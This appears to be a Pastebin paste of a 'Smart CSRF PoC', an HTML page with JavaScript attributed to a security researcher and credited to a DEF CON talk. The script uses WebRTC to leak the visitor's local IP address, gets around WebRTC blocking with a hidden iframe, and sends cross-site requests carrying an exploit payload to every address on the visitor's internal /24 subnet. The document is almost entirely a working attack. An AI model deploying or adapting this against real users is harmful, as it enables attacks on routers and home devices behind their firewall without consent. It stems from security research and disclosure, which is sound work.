Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <HTML><TITLE>Smart CSRF PoC</TITLE>
- <!--
- The MIT License (MIT)
- Copyright (c) 2015 Daniel Roesler
- Permission is hereby granted, free of charge, to any person obtaining a copy
- of this software and associated documentation files (the "Software"), to deal
- in the Software without restriction, including without limitation the rights
- to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- copies of the Software, and to permit persons to whom the Software is
- furnished to do so, subject to the following conditions:
- The above copyright notice and this permission notice shall be included in all
- copies or substantial portions of the Software.
- THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
- SOFTWARE.
- -->
- <script>
- // Linkback: http://www.tripwire.com/state-of-security/off-topic/smart-csrf/
- // This code is derived from a PoC I came across on GitHub: https://github.com/diafygi/webrtc-ips/blob/master/README.md
- // I have only slightly modified it to assume the IP is on a /24 and iterate over the addresses with an HTTP request.
- // A version of this script including the payload for a 0-day in a home automation product was demonstrated at:
- // DEF CON 23 IoT Village and InfoSec Europe 2015 Intelligent Defence in a talk titled 'Smart Home Invasion'
- // Interestingly enough, this code worked in Chrome even without an Internet connection to reach the STUN server.
- // -- Craig Young, Security Researcher Tripwire VERT
- //get the IP addresses associated with an account
- function getIPs(callback){
- var ip_dups = {};
- //compatibility for firefox and chrome
- var RTCPeerConnection = window.RTCPeerConnection
- || window.mozRTCPeerConnection
- || window.webkitRTCPeerConnection;
- var useWebKit = !!window.webkitRTCPeerConnection;
- //bypass naive webrtc blocking using an iframe
- if(!RTCPeerConnection){
- //NOTE: you need to have an iframe in the page right above the script tag
- //
- //<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
- //<script>...getIPs called in here...
- //
- var win = iframe.contentWindow;
- RTCPeerConnection = win.RTCPeerConnection
- || win.mozRTCPeerConnection
- || win.webkitRTCPeerConnection;
- useWebKit = !!win.webkitRTCPeerConnection;
- }
- //minimal requirements for data connection
- var mediaConstraints = {
- optional: [{RtpDataChannels: true}]
- };
- //firefox already has a default stun server in about:config
- // media.peerconnection.default_iceservers =
- // [{"url": "stun:stun.services.mozilla.com"}]
- var servers = undefined;
- //add same stun server for chrome
- if(useWebKit)
- servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
- //construct a new RTCPeerConnection
- var pc = new RTCPeerConnection(servers, mediaConstraints);
- function handleCandidate(candidate){
- //match just the IP address
- var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/
- var ip_addr = ip_regex.exec(candidate)[1];
- //remove duplicates
- if(ip_dups[ip_addr] === undefined)
- callback(ip_addr);
- ip_dups[ip_addr] = true;
- }
- //listen for candidate events
- pc.onicecandidate = function(ice){
- //skip non-candidate events
- if(ice.candidate)
- handleCandidate(ice.candidate.candidate);
- };
- //create a bogus data channel
- pc.createDataChannel("");
- //create an offer sdp
- pc.createOffer(function(result){
- //trigger the stun server request
- pc.setLocalDescription(result, function(){}, function(){});
- }, function(){});
- //wait for a while to let everything done
- setTimeout(function(){
- //read candidate info from local description
- var lines = pc.localDescription.sdp.split('\n');
- lines.forEach(function(line){
- if(line.indexOf('a=candidate:') === 0)
- handleCandidate(line);
- });
- }, 1000);
- }
- getIPs(
- function(ip){
- var local_regex = /10\.[0-9]+\.[0-9]+\.|192\.168\.[0-9]+\.|172\.16\./
- if (local_regex.exec(ip) != null) {
- var subnet = local_regex.exec(ip)[0];
- for (node=1; node<256; node++) {
- var url = 'http://' + subnet + node + exploit_URI_payload;
- var oReq = new XMLHttpRequest();
- oReq.open("get",url,true)
- oReq.send();
- }
- }
- }
- );
- </script>
- <H1>o0o0o0o0o0o0</H1>
- </HTML>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement